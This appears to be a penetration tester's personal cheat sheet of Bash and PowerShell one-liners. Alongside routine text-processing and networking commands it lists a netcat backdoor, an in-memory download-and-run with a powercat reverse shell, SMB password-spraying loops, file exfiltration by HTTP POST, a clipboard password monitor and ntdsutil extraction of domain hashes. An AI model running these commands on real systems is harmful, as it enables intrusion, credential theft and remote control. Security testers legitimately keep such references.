Comment on page


Quick fast and speedy


GREENIE=haha; export GREENIE
Create an environment var, then export var to be available to other programs
adds a folder to PATH while retaining it
sort | uniq -c | sort -n
Takes stdin, sorts it, finds out the count of each unique value, then sorts by number
cat squid_access.log | sort -k 2 | head
Using the sort -k parameters sorts on the second colmun of the output
wc -l [lines]
wc -c [bytes]
wc -w [words]
Count lines/bytes/words in a file or from stdin
awk '{print $1,$4}'
Print characters 1 and 4 (not zero indexed) from stdin
awk '{print $(NF-1)}'
print the 2nd to last column
awk '{print length, $1}'
print the length of each line and the contents
awk '{ sum += $1 } END { print sum }'
Takes the lines from a file/stdin and adds up the values, quick and dirty calculator in terminal
cat peptides.txt | while read line; do echo $line; done
read in lines from peptides.txt, then perform echo for each line. Useful to loop through commands for a list of items
cat users.txt | while read i; do echo trying $i; smbmap -u '$i' -p '$i' -H; done
Password spraying using a bash loop
for i in {1..5}; do echo $i; done
Loops from 1 to 5 and echos for each value of i
for i in {000..999}; do echo KEY-HAHA-$i; done
Creates a list of all values from KEY-HAHA-000 to KEY-HAHA-999
TF=$(mktemp -d)
Create a temporary directory (i.e. /tmp/tmp.gq9gT5U3) and assign as an environment variable
bash will return the amount of characters in the TF variable
sed 's/12/13/g'
Replace 12 with 13 found anywhere in stdin, will replace 1234 with 1334
sed -i.bak '/line to delete/d' *
Delete a line of text for all files in a directory
xxd -p
Print the hex of stdin or a file only, no hexdump format
xxd -r
Interpret raw hex from stdin, can redirect to save the hex to a file
tr -d '\r' | tr -d '\n' | xxd -r -p
Takes hex input, removes newlines, and places into a file
find / -user Matt 2>/dev/null
Find all files owned by Matt on the box, redirects stderr to null
find /etc -type f --name apache2.*
Find any file which begins with apache2.* in /etc
grep -E "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"
grep with regex to match any valid IP address (yes it's ugly)
curl -d "param1=value&param2=value"
Send parameters with curl
date -d @1286536308
convert an epoch timestamp to date output
mknod backpipe p; /bin/bash 0<backpipe | nc -l -p 8080 1>backpipe
Create netcat backdoor without -e support. Generates a named pipe to funnel data
tar -zcvf files.tar.gz /var/log/apache2
Creates a files.tar.gz archive of all files in /var/log/apache2
Prints all IPs in a specific subnet
ifconfig eth0 netmask broadcast
assign an IP from terminal
ifconfig eth0 down; ifconfig eth0 hw ether 00:11:22:33:44:55; ifconfig eth0 up
change MAC for interface
dhclient eth0
request DHCP address
dd if=./input.file of=./outfile
make a bit-by-bit copy of a file or system
sudo ln -s /usr/bin/python3 /usr/bin/python
create a symbolic link for python to run python3
sudo mkdir /mnt/new
mount /dev/sbd1 /mnt/new
umount /dev/sdb1
mount/unmount a filesystem
sudo route add -net default gw netmask dev wlan0 metric 1
Add another default route with a higher metric to choose a different interface to access the Internet
sudo dhclient wlan0
Request a new DHCP lease on interface wlan0
openssl enc -aes-256-cbc -salt -in file.txt -out file.txt.enc
encrypt a file with a password at the commandline
openssl enc -aes-256-cbc -d -in file.txt.enc -out file.txt
decrypt a file using a password at the commandline


get-childitem -hidden
See all files in current dir
gci -recurse C:\ | % { select-string -path $_ -pattern password} 2>$null
search through all files in C:\ for the string password
1..255 | % {ping -n1 192.168.0.$_ | sls ttl}
Counting loop for ping sweep
(New-Object System.Net.Webclient).DownloadFile("","C:\nc.exe")
Downloads a file to the C:\ location
IEX(New-Object System.Net.Webclient).DownloadString('');powercat -c -p 8001 -e powershell.exe
download a ps1 file and execute it in MEMORY only
certutil -hashfile ntds.dit md5
Hash a file
certutil -encodehex ntds.dit ntds.hex
Encode a file as hex
certutil -encode test.jpg test.base64
certutil -decode test.base64 test.jpg
Encode and decode a file as base64
@FOR /F %p in (pass.txt) DO @FOR /F %n in (users.txt) DO @net use \\SERVERIP\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\SERVERIP\IPC$ > NUL
Dirty looping command to gather a list of users and passwords to bruteforce a server on SMB
Invoke-RestMethod -Uri -Method Post -InFile copy_cert9.db -UseDefaultCredentials
Sends the file to a server, catch the file on the other end
iwr -uri -outfile SharpHound.ps1
Download a file from another machine
$x=""; while ($true) { $y=get-clipboard -raw; if ($x -ne $y) { write-host $y; $x=$y } }
Powershell - monitors the clipboard and prints to the screen as items are placed on it (passwords!!)
activate instance ntds
create full C:\ntds
Use built-in ntdsutil tool to obtain the SYSTEM registry and hive data as a backup, contains user hashes to crack